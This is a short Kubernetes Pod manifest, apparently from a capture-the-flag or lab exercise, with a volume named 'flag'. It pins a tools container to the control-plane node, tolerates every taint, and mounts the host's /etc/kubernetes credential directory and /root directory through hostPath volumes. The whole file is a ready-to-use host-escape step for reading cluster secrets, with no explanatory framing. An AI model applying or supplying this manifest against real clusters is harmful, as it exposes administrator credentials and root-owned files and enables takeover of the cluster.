apiVersion: v1
kind: Pod
metadata:
  name: sectools
spec:
  nodeSelector:
    node-role.kubernetes.io/master: ""
  tolerations:
  - operator: Exists
  containers:
  - image: jpts/sectools
    command: ["sleep", "2d"]
    name: tools
    imagePullPolicy: Always
    volumeMounts:
      - mountPath: /host/etc/kubernetes
        name: secrets
      - mountPath: /host/root/
        name: flag
  volumes:
    - hostPath:
        path: /etc/kubernetes/
      name: secrets
    - hostPath:
        path: /root
      name: flag
